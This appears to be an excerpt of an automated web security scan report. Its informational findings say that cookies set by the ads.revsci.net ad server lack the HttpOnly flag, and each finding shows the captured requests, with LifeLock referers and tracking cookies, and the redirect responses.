GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=B61F640647B02C55E5E04158E5824DE8&rsi_site=F480C2F6A639433D3F28497600570CE9&rsi_event=86482AA5D962F069710E763F630061A8 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/about/leadership/management/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4dd5f13b&0&&4dafa03c&271d956a153787d6fee9112e9c6a9326; udm_0=MLv38yMNYS5n556rUdZEx/o5eypOaEu8COAR17ri5FFJ0FR/DCVho1i888MpWECz+KvddW96x+ZWMrHZZuFYWRdi0Ttiyn6zmLDSlA1uK95C57yGzucOrJqdmL6fFrDcpSvmOSk7BOclNUt7RWlHZoyNrt1GLRfxm3bRtuo2CfyPwIJ/yXIAQjMu7i9OMYPewidKA0q1/0uUpVDAPnfPRNdmew//1T+ZotabTg8c6ayt0ayU5KxhIlMO0zhOP+L3247oh64Wc2CGn1MgWnIHe9nWSStP+vc6kJiQpsVud+5ttYUkKtL8m1QBsvc2/MfTrSmJXnI0dWUX75l0GP8iD+KrsfI2MNrGUtVIQ+uZpa5N+rfJ3lseYi9c8QjhAvNpVCtRO9ENE5mMruL7893kOpOAY7IcULkyGYGsBCxY4sI+d66lxNMlDF6k5UXCb8knlYN/Ww8/EpdaqhzyZL8eG/1Dj0jowZw0Nb+vX8bLorj2cXoM5TKooNjNwtfIyY/oCL0URLzpE+ULxxBO1PzzSumsnbQQckx94LUaOrT7yu7lzVJmdz68WyvKoVQZN8Yb/mxU8hMOrTYTuin/4XutORAJHPqgXVVZMUEu/kYIQ6h8fItk7HAyphTBHafByMNgzViF+86acuNmqPehmSwyo3bzOGaQ8D7cEC/HS+Km7YhnHldp/ftWGbDtTF1Mk+knFnPQbrlieCuaiTJ48OpD52r2+G/oXon0B2LAbkexGJxvbxgRFoJUuIqP7MvKAg5uf1qRa+CVa0kCPCp2ApjgCjYEUuggGpRMd/ubeKFd8+mErIfNzt3ioYjTAAREuUw/nLZibhMbKs3ak/BgaCjr2wSYrdjv6T2Xm7fVBvuqRw0yq9LZm7fqGntvbSbNQ47Yx5AQ4foj97nVvbrEwlss5I8KXNM+tQ==; rtc_PX8c=MLsvr6dssA9jpgAwLTy07NLkFT5pbG1D0HxZtFIMJ5WMmZvbeI58VT31YjW2r/grkF71Pt6B4W3+U1vgzgHP6Nj/3l7CCsilLpq71jmxvUdE4BZGYpc959fJsSNEYdh2a93/U8ympzOYdZfnH90nEI5qWKl30EvxtUMTaCCWVsIXo80UvQSGSpH11YN+FHSPknkO7SGXPlezd4yuKNwQI8ilQ1yLkGB6eUZJ; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgqYlBtLYIVF5A2r78vfkK4mqrxmVeJWtwf0wDT7Fu8GN7lxA1Dc9KwErSmP4dXT1xuPfRGzjDpsZZccj2XuQUdkGz6y/8O3Ed+Hq3bYHDGvt4sfjvsXqbPn/CNAzsAbA==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4dd87afe&0&&4db23a33&271d956a153787d6fee9112e9c6a9326; rsiPus_btY7="MLsXr98vcS5joAC3cWnZbLu/LxacmO6l/ARkBxpP1JJrJebK5u0oIec5hQtxppxsRjkmyEG97JGtnHKzbcarrWXvOcKbltf7xkGa+l8zg6NsPWUKQV5HJAXQeFCR30Ociq0ao4q/grq6lsLC0KtAAADMs0buh6LSM9MG0LIcGHe70yIHgew/Eh0uLc+4c/4njp7GcyDdtqAZMSdSszG+gH0nvDhtaDXsHq2y65tYaObosUQZbnlscgHkfcZA4xP0oaQn/Lk2j36bu66uGkRrS4CsiWzoeFXOeaMh4yHFMNx7MqLYBUYmEVrbUD55ScTBefUUF0U4E7w5UEa9kMK7iC9gTmt3xw0L/2hRO9SwVqZNP64GcOJoZDuIezY3VtCazAUM7wNTb7K0tPc0/B538LlHHOIWHyDI6Pcx"; rsi_us_1000000="pUMdJD9HMAYYlW23lB1elXr9hifjv2rR/V4c+8rGrfYpD4E7DYk/sDOMiD26ze9j90z9N83XdjZt9ZtbR0ijMugza0Qe5pDvWTr6P4O2VQdjPWf6987WWc8u5KEGwpBscqKQZ1BB2LCvdm6n578p4Rvu6q0mDJHnkT/2jbqILCYLacH0wg0BO/PRs5ivndkckUxb3rhBm6zdK7VzeQeU44tgNRzskkGjN35lToNd85zTK6Vj+9BBbxpbelASsgX6/CR8Y5xVC8aI0ZxOO9+xP1LJ2VtAHTZTiV00au+sbBtvKMxT926tMzK0H5cwsw+g/cYgBE0rDkLsCjUxh6FLjC7i6EMGwHUbcgJhoCDKlItJyK8FU8pMQoukW4Ksl1ZOpqZ7GC0HHNVqD6t3U32r9sbTyZkKK+QA8JjzMDrdR4tTUP2OU1HeXuSVxv1yl+5/L2aqQXy3rE21OIbAG0Txff9Q6+QE4SRR2rr8yhSPM8aOTW2BlGO/zv4pDbki5ENYG1rAwHxPcsScK1CIu7nP426FZdWFs4e21wjcqJyCbd5JPJ40ccpki7u1RrKAV+CG6LFFkj53H1SCrbYfOIRrLfH5rh4eL0cfZ/vrFCCr/HEZmnQwfSO4bhpS1mYMFRTXljVGrQBXZP23w1g4SB2h2r6MHc5Pzt36KPxeMWOL5008JyU50uBQkV+DdYK4Gk+NchyAu4bzHS5mv/nQZXciumcSgzF8+UUvGNyoCfGNhSTai5t86Aacd0zjGzqDaj+g6z+b8nem9ZIkW8qaa0CMbJFNkcqd6zbZHfm4bwKc4OXmjNFwXw/aqQPgXGZdNiAABShzNlnnILNvQI/L4iLNmM8NLZISUdj8Bywe/xU4CPbov0NZunyZnU87RNKIJ8ju6qLTygwGnjEmKh4STE2cZsDOvcNSCTjfRSj9TWHSYPlOxGSR3K91I2CEvVf/GjySVjhJlm3bhym+JGHVNPjKwzs0PgWWBuKLIQBlJoyq1iJREoGQ2gRM+eiMu3rkpU9zbDFvwNQMS8je4aRvBwY="

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_btY7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_btY7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_2Ia5="MLsXr98vcS5joAD3TrInbrsHB6iUxxv6U9Ewo82dvq95LzyKcUd+SGxI5LXUVUbqNw0KcSykIgDMCLZ+LUekPkU3ZzHAnufPANfumkONPJ1vRRh59tenoHHjrRb5k67Sm6BnvhZOe1mCSUSYzT/0fgOACtqy5iXVomtxAZzacvIs1os8ctiYILCzcUGEKwAUbYDZ+gRfyTNVizEkjHghBeBOehkXDWkFVpZNcmrau472yi7Tk1UQDlT2PRGx4ny6aEMndDmCQRPdzJomsgEPKOZANGnQYsYrLEvr+wJqPo2Md9XyeSIz5rA/HijFNKINO3FJhacxFZoYVdm5OhizDcF2J4MFaMQYQ5VLkgCwK5k1whxQ3zMkV3gw6CsqcayotvrS10X59UwbUP/ABx6/FxtZ9qF5+9xsG5L3dw=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMdJD9HMAYU1E2EPnsIIDz/BtZLv2rR/V4c7O6C3v7m/kxmFYk/sE+g72Wvze9j97z84DKAm0Rt9ZtbR0ijMugza0Qe5pDtWTr6P4O2VTn9svj69842Hfo95KEGQpbMeW+0NaNhmBYTXTkRQKS1XMUccblUZCb8d1ioTrWzOZ45+knAG4/fSC2XVCuSI3SfynIhw/0lJepQCzIltDUGLYzLUkLv/MFxI8xXEt5FPdByafvFHnwcc+g50hOTbL+g7n64N54Np8vbYE35aYyaJiGjpBaC12VhkZlzFtMxirRDAwPWID4NdT8+H1n+vIDBsAcC4v6vpxRHAQWP/wFECr4Zl33i7snI0unkbnfWDKcc2lBdCDsvleyPGu7IGOFhOgsC4wPBBfAj1GcROo+BilbXokC4Pz9vadLAfzLPlIdm0h4ILB9XSlyVc4b6FJRKQ8GSIuCUsCUIuhiY7qOe4dxMbmgcF8Z5vsbPVtNU5unXYkl1MhFPAXo6dObcC7t2Mp4lHB3smqaDjmSWTHYhcyvCsdckm7oUK5b0m3OWakUES9n6/gVIYIYYx4Q8OEV/NJVzUMJ3P0YTcfNkdzUeqj3w7I6vhwmxCxO1HK1RTc4UB35R4M3XJY0QrizGyoGlm9y6oPqyNcDNzYKTvC6oJGklEo2V4PXXhd5rDMHIhx2MXWu4IK+b30e7OfPWDWKlQbvGkOch0VHJWX9SvL5QvXWojkDL40JInzmAVr4XQyDFi7ty6xaQdTP7HzqDar+jK2lgMToKlZIkWUobdESNbO5VUYuF6zbZ/f7YfwXtEOZYHnlawNXis8+0xTL3web3W3GLT/ZTAh4qtrkjAQnd3V8EdMPIYePwpRv8DD3B2L4a6XH5lygIq/vjuHhcNjMMUQ+X+fLAOHHNWjDM+52IKUhADIXMSqGCsUEAyiBu5V+I6rJBxrv9bh4sTdGrxy8QWKFJQU2vB09tMV34No6/mhl+STAB+L7fmkFhELkBHvTZutKd7KYQ1aPWbdRmJfIrHLhmsKllabrGbl63"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=108869&t=2
Content-Length: 0
Date: Sun, 24 Apr 2011 03:08:42 GMT


18.186. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=B61F640647B02C55E5E04158E5824DE8&rsi_site=F480C2F6A639433D3F28497600570CE9&rsi_event=86482AA5D962F069710E763F630061A8 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/guarantee/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4dd5f13b&0&&4dafa03c&271d956a153787d6fee9112e9c6a9326; udm_0=MLv38yMNYS5n556rUdZEx/o5eypOaEu8COAR17ri5FFJ0FR/DCVho1i888MpWECz+KvddW96x+ZWMrHZZuFYWRdi0Ttiyn6zmLDSlA1uK95C57yGzucOrJqdmL6fFrDcpSvmOSk7BOclNUt7RWlHZoyNrt1GLRfxm3bRtuo2CfyPwIJ/yXIAQjMu7i9OMYPewidKA0q1/0uUpVDAPnfPRNdmew//1T+ZotabTg8c6ayt0ayU5KxhIlMO0zhOP+L3247oh64Wc2CGn1MgWnIHe9nWSStP+vc6kJiQpsVud+5ttYUkKtL8m1QBsvc2/MfTrSmJXnI0dWUX75l0GP8iD+KrsfI2MNrGUtVIQ+uZpa5N+rfJ3lseYi9c8QjhAvNpVCtRO9ENE5mMruL7893kOpOAY7IcULkyGYGsBCxY4sI+d66lxNMlDF6k5UXCb8knlYN/Ww8/EpdaqhzyZL8eG/1Dj0jowZw0Nb+vX8bLorj2cXoM5TKooNjNwtfIyY/oCL0URLzpE+ULxxBO1PzzSumsnbQQckx94LUaOrT7yu7lzVJmdz68WyvKoVQZN8Yb/mxU8hMOrTYTuin/4XutORAJHPqgXVVZMUEu/kYIQ6h8fItk7HAyphTBHafByMNgzViF+86acuNmqPehmSwyo3bzOGaQ8D7cEC/HS+Km7YhnHldp/ftWGbDtTF1Mk+knFnPQbrlieCuaiTJ48OpD52r2+G/oXon0B2LAbkexGJxvbxgRFoJUuIqP7MvKAg5uf1qRa+CVa0kCPCp2ApjgCjYEUuggGpRMd/ubeKFd8+mErIfNzt3ioYjTAAREuUw/nLZibhMbKs3ak/BgaCjr2wSYrdjv6T2Xm7fVBvuqRw0yq9LZm7fqGntvbSbNQ47Yx5AQ4foj97nVvbrEwlss5I8KXNM+tQ==; rtc_PX8c=MLsvr6dssA9jpgAwLTy07NLkFT5pbG1D0HxZtFIMJ5WMmZvbeI58VT31YjW2r/grkF71Pt6B4W3+U1vgzgHP6Nj/3l7CCsilLpq71jmxvUdE4BZGYpc959fJsSNEYdh2a93/U8ympzOYdZfnH90nEI5qWKl30EvxtUMTaCCWVsIXo80UvQSGSpH11YN+FHSPknkO7SGXPlezd4yuKNwQI8ilQ1yLkGB6eUZJ; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgqYlBtLYIVF5A2r78vfkK4mqrxmVeJWtwf0wDT7Fu8GN7lxA1Dc9KwErSmP4dXT1xuPfRGzjDpsZZccj2XuQUdkGz6y/8O3Ed+Hq3bYHDGvt4sfjvsXqbPn/CNAzsAbA==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4dd87afe&0&&4db23a33&271d956a153787d6fee9112e9c6a9326; rsiPus_Kz1B="MLsXr98vcS5joAD3bWnZbLvnP/+KE1cvxxz+0wdb2PxBN+R0RSFIK3cKZ3+o5AVFSd5d5ssFdZ2XdS1J6ERW+BtM90GwO1Jf3J+svMJ4/csB8HP99h1rKGCqCGIh2xYI3Fvzvh3NuiMBnovWFDuF1xjfsYP1R8qsG42VULSa+sr/35iz34m/11lMDXN1AX9njioLN2ChPaIXlfxBectuiUVgU0P45W3JtxbyyxtPjFDFvSB3z65Y465ibv+/5utsqAHA6C7nBh6djpodR2d3ogV4aXJvd1v+vu8G0OhpMAsq67dES6DnMmod26xlYmpIm7oLLHQreFyS+X9JpEnNjiLVeG1pqatl8HZNbwSbBG8PdUu8OmYBIq2J4KA3tC3AUVE/bcNrvKaXikFYzLm/nYzn3T771H+QePf7"; rsi_us_1000000="pUMdJD9HMAYYlW23lB1elXr9hid7vWrRtcbg/87S4gsVar0CeCLBpcKI72Wvze9j97z84TKAm0Rt9ZtbR0ijMugza0Qe5pDtWTr6P4O2VTn9OWf69842Hfphbg/yHhecjeZxoBUgnlB/F2HdUOiY/FnNpAR6Yb4p11NSMhG/KP2u7EP6r3IydGDFeOiju1DJKUDpjfkg6EczNi2MImmflQIF1cOVVjLfTIctA84K1Duqop5MuAE9pP2A+QQfoGhYngbnTf97wilg35GyS3/8ryDOEJH5EumfAisx5oE+dY3kzYargOAvr0G9H+GYdgpAvQb5TKPGOgN6EiCaPSm5rnJxzMqA6rO3mpCX77qa2Ho0jD3aEltyb9bJMqJ9PwqUsVpjeSYp4WGNO3JRdKJxgfniKDmNefa2d1BW2Wh8kghoYpxfExL2Wjyu5Ewt0XZcuSo4HFo+cf7EfuqX3CStW3aNIaM2ycgH5HD7+aiYvP6CLDcIR9llQyuAnOJlOgf1SYPoNDEZiaROfoFMHCCACbTyTwsIZo7gKIyJzj6oBezmQIyuVdfB0qAsJlBrbXvSia2r0+p3f1uNsfNkdzUeqiXwrKqeL0cfZ/vrFCCr/HEZmnQwfSO4bhpS1mYMFRTXljVGrQBXZP23w1g4SB2g2r6MHc5Pzt36KPxeMWOL5418bzHZdWwqa13n89Ok/6a1QUG2VDo9UTTOb+JLnM2sYKk7sbkOFh4SBVM8phfg7sZLufZucWACOs/NLHHFV5agvJZmE1D0bSq1HSY5y44BZhNz2hBTwyEyITUaX2uP/Q1XHnliwNTiMU60QUP3w+Y3RPX0z5E/HIUe5Kt7Agvbwl+yWOum+d0YXNX2zxnx903R08ea5ceS5PWRH/1MT2luVJbro74r6EmLVmoshJLasg7fnzqszJ2WV9c+bKMnT+z8ZN1FhKx/K0FWoUf1EEuWbvAz4cqAfgEtHfT8+fo6aj/rPHGUjNsNae6l1VttJItBc2XnDjizNH7anCs3JH29ZpHJCcZvoOS6ifQ3AsA="

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Kz1B=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Kz1B=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_o_YB="MLsXr98vcS5joAD3RWnZbLtzZAzP6/3QvbFY8brNjhfQZzRy/3X9YSyGbFxsN8G0yqulX+Pn6fT77EwpfyXgQdDoD8ExG9XdosQTSO5JaI/ifm4pCaBWAGUXgyxMnMeayp9qM4Dfxcgivu6oRZYK4tLsyUCNHsJzA0ue4bYZm3Yr1Ii/8Frh4YCDSU2AKRAYmYO4mhxXzjFVizEkhHghBeBMejkXDWkFVpZFdJBb+7HqzCzTk1UQDlT2PROx4nyyaEMjdDmLFND1M5pXG++vMJzhD7J7mRXm6jp5YWVv1nqFctXyeSI7ZLD/HSjFMKINO4FJgacx3JvckX6F4tmU1Fj0WAtVBJbk2nr4A7CJzwfNMNhtSyL1bGn7HiJkIFLdmtlcSukRVDvh+KeI1SEyoci/ul5Ntl5t9EXwew=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMdJD9HMAYYlW23lB1elXr9hif7oMCGHppJ8S4dCaezGRJhlUWVyRvUosdoZNavV8q90zKD5s/ez6yLk/3MyALEhJth7PRDWcqYy1fztHQnZ+eGOprDErg4uKj3Y26WxWclP5Xwum07f9vg4fQdGgwgCWnLAVuwjXo9LLfaqw046Iln7+E+3F6qjUNIRuOkdO9MYwCv4CDy0/3Kb9+Wl3aCZv0ItNg1+yO6kh/JTRJxDejvBYxAgmw7i43J3ecXGUlCWv2i5Nf79A1wYSKmlJCIaymo3gG4KwA1yTTI6t4Nkc6tqs2NbI61n+o6xA+Y77YQlrYTI9JJbPgZKRz3+ulGoPGhSkQQ1GbdMwH+y/dWWUtyw24DCRz/AcqY3cG4oo0NIK9CLwBfQh26itpdy4mf8bOovwDj0eaa6g62V2hfDTysp7moX5MYjmHlhgj7JvXOxjXVuyAp1V0RKl12NJ3nGHMI65/MZUj90SXBV8RL5ZenSRMka2G3IaKIvKih5uQb+QJ7LqGL9pZiO2AudY9hX/aRFtAiCBuqTjfnnm2gMnEMf/52b9pFxHk+8EG6iwrqbv53bcHGIhlkcdyNR4SeoSXfFd48PzZdq4AIxW2yjYKjriwPAI6vnDIea4CL7QinSWNGEIkSqIXYtFNiYIVFvIJtS2MFxcfzJXdcAfn8ozwv03Bi0JzmeaCHEoIqyMSEqoJaI/JqaqOGOWdjmlZUYLQIBnDO+TGFxtx+FBjVY1sWLMrNv6c4B44LpPENQqOMcBXWyly86T6H2zx246HUzjUmwZ6jui1LBt9nRTW59ygZ/XX//bkI2DnA0okFtLxeR/J9gYwfiH+KRqguE7UJbbiSjrWiKo7Ox59VdZcbmC0ER00K5/r3XvdcFwpkzWDRZKpU65hkqtFIcZe5WmY38LsdMH268wBBiQqcAohZQHUG15pBgz3LB7kMWAUnSKHiE2X2pagnZmTVmWVP476LC8KGVdX2Eph7k1eYUQjRVJqr0q2tVIyN6OWkrSGPJKRsP1AZL3rEdIZfeg=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=108869&t=2
Content-Length: 0
Date: Sun, 24 Apr 2011 03:08:55 GMT


18.187. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=B61F640647B02C55E5E04158E5824DE8&rsi_site=F480C2F6A639433D3F28497600570CE9&rsi_event=86482AA5D962F069710E763F630061A8 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/offers/faces/female/?promocodehide=ADCONIONRT&c3metrics=adcon
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4dd5f13b&0&&4dafa03c&271d956a153787d6fee9112e9c6a9326; udm_0=MLv38yMNYS5n556rUdZEx/o5eypOaEu8COAR17ri5FFJ0FR/DCVho1i888MpWECz+KvddW96x+ZWMrHZZuFYWRdi0Ttiyn6zmLDSlA1uK95C57yGzucOrJqdmL6fFrDcpSvmOSk7BOclNUt7RWlHZoyNrt1GLRfxm3bRtuo2CfyPwIJ/yXIAQjMu7i9OMYPewidKA0q1/0uUpVDAPnfPRNdmew//1T+ZotabTg8c6ayt0ayU5KxhIlMO0zhOP+L3247oh64Wc2CGn1MgWnIHe9nWSStP+vc6kJiQpsVud+5ttYUkKtL8m1QBsvc2/MfTrSmJXnI0dWUX75l0GP8iD+KrsfI2MNrGUtVIQ+uZpa5N+rfJ3lseYi9c8QjhAvNpVCtRO9ENE5mMruL7893kOpOAY7IcULkyGYGsBCxY4sI+d66lxNMlDF6k5UXCb8knlYN/Ww8/EpdaqhzyZL8eG/1Dj0jowZw0Nb+vX8bLorj2cXoM5TKooNjNwtfIyY/oCL0URLzpE+ULxxBO1PzzSumsnbQQckx94LUaOrT7yu7lzVJmdz68WyvKoVQZN8Yb/mxU8hMOrTYTuin/4XutORAJHPqgXVVZMUEu/kYIQ6h8fItk7HAyphTBHafByMNgzViF+86acuNmqPehmSwyo3bzOGaQ8D7cEC/HS+Km7YhnHldp/ftWGbDtTF1Mk+knFnPQbrlieCuaiTJ48OpD52r2+G/oXon0B2LAbkexGJxvbxgRFoJUuIqP7MvKAg5uf1qRa+CVa0kCPCp2ApjgCjYEUuggGpRMd/ubeKFd8+mErIfNzt3ioYjTAAREuUw/nLZibhMbKs3ak/BgaCjr2wSYrdjv6T2Xm7fVBvuqRw0yq9LZm7fqGntvbSbNQ47Yx5AQ4foj97nVvbrEwlss5I8KXNM+tQ==; rtc_PX8c=MLsvr6dssA9jpgAwLTy07NLkFT5pbG1D0HxZtFIMJ5WMmZvbeI58VT31YjW2r/grkF71Pt6B4W3+U1vgzgHP6Nj/3l7CCsilLpq71jmxvUdE4BZGYpc959fJsSNEYdh2a93/U8ympzOYdZfnH90nEI5qWKl30EvxtUMTaCCWVsIXo80UvQSGSpH11YN+FHSPknkO7SGXPlezd4yuKNwQI8ilQ1yLkGB6eUZJ; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgqYlBtLYIVF5A2r78vfkK4mqrxmVeJWtwf0wDT7Fu8GN7lxA1Dc9KwErSmP4dXT1xuPfRGzjDpsZZccj2XuQUdkGz6y/8O3Ed+Hq3bYHDGvt4sfjvsXqbPn/CNAzsAbA==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4dd87afe&0&&4db23a33&271d956a153787d6fee9112e9c6a9326; rsiPus_o_YB="MLsXr98vcS5joAD3RWnZbLtzZAzP6/3QvbFY8brNjhfQZzRy/3X9YSyGbFxsN8G0yqulX+Pn6fT77EwpfyXgQdDoD8ExG9XdosQTSO5JaI/ifm4pCaBWAGUXgyxMnMeayp9qM4Dfxcgivu6oRZYK4tLsyUCNHsJzA0ue4bYZm3Yr1Ii/8Frh4YCDSU2AKRAYmYO4mhxXzjFVizEkhHghBeBMejkXDWkFVpZFdJBb+7HqzCzTk1UQDlT2PROx4nyyaEMjdDmLFND1M5pXG++vMJzhD7J7mRXm6jp5YWVv1nqFctXyeSI7ZLD/HSjFMKINO4FJgacx3JvckX6F4tmU1Fj0WAtVBJbk2nr4A7CJzwfNMNhtSyL1bGn7HiJkIFLdmtlcSukRVDvh+KeI1SEyoci/ul5Ntl5t9EXwew=="; rsi_us_1000000="pUMdJD9HMAYYlW23lB1elXr9hif7oMCGHppJ8S4dCaezGRJhlUWVyRvUosdoZNavV8q90zKD5s/ez6yLk/3MyALEhJth7PRDWcqYy1fztHQnZ+eGOprDErg4uKj3Y26WxWclP5Xwum07f9vg4fQdGgwgCWnLAVuwjXo9LLfaqw046Iln7+E+3F6qjUNIRuOkdO9MYwCv4CDy0/3Kb9+Wl3aCZv0ItNg1+yO6kh/JTRJxDejvBYxAgmw7i43J3ecXGUlCWv2i5Nf79A1wYSKmlJCIaymo3gG4KwA1yTTI6t4Nkc6tqs2NbI61n+o6xA+Y77YQlrYTI9JJbPgZKRz3+ulGoPGhSkQQ1GbdMwH+y/dWWUtyw24DCRz/AcqY3cG4oo0NIK9CLwBfQh26itpdy4mf8bOovwDj0eaa6g62V2hfDTysp7moX5MYjmHlhgj7JvXOxjXVuyAp1V0RKl12NJ3nGHMI65/MZUj90SXBV8RL5ZenSRMka2G3IaKIvKih5uQb+QJ7LqGL9pZiO2AudY9hX/aRFtAiCBuqTjfnnm2gMnEMf/52b9pFxHk+8EG6iwrqbv53bcHGIhlkcdyNR4SeoSXfFd48PzZdq4AIxW2yjYKjriwPAI6vnDIea4CL7QinSWNGEIkSqIXYtFNiYIVFvIJtS2MFxcfzJXdcAfn8ozwv03Bi0JzmeaCHEoIqyMSEqoJaI/JqaqOGOWdjmlZUYLQIBnDO+TGFxtx+FBjVY1sWLMrNv6c4B44LpPENQqOMcBXWyly86T6H2zx246HUzjUmwZ6jui1LBt9nRTW59ygZ/XX//bkI2DnA0okFtLxeR/J9gYwfiH+KRqguE7UJbbiSjrWiKo7Ox59VdZcbmC0ER00K5/r3XvdcFwpkzWDRZKpU65hkqtFIcZe5WmY38LsdMH268wBBiQqcAohZQHUG15pBgz3LB7kMWAUnSKHiE2X2pagnZmTVmWVP476LC8KGVdX2Eph7k1eYUQjRVJqr0q2tVIyN6OWkrSGPJKRsP1AZL3rEdIZfeg=="

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_o_YB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_o_YB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_hX-W="MLsXr98vcS5joAD35amm7m19U6iUxxv6U9Ewo82dvq95LzyKcUd+SGxIJH6o5AWlJkXeWWHv5qH4v/rM6OkMWqsFTvNPsXNekBTra/wwM4K2sibLTV2AOHFxkiVE9wV4/aofu4mf+YzCLyKAhfLTTeqCuZtujWf0mVUBm5iueociN9nMcHEBiWq4o9fatvXmE6yZ/0kCX73FbCLj/eLX67dLITBGr6Vts2oYC1XMLcjvcbHvF+Gfp+KabcKl3A3N5GRsbVvBxAgcV8qGf0I5oRF4rmVtRQWqfG3YSgbjakDBikQcLdr73FrrV7LpTFHBo/ShP4v0zweUXVvR2lDfsTUqd9mF4ch3/QIDNuIgzv2zwCKIcl4kIFp4Jb57PXWhqKOjlNBT/qEfJ76Dv808tBtcl+x2CIuaYlEz7rw="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
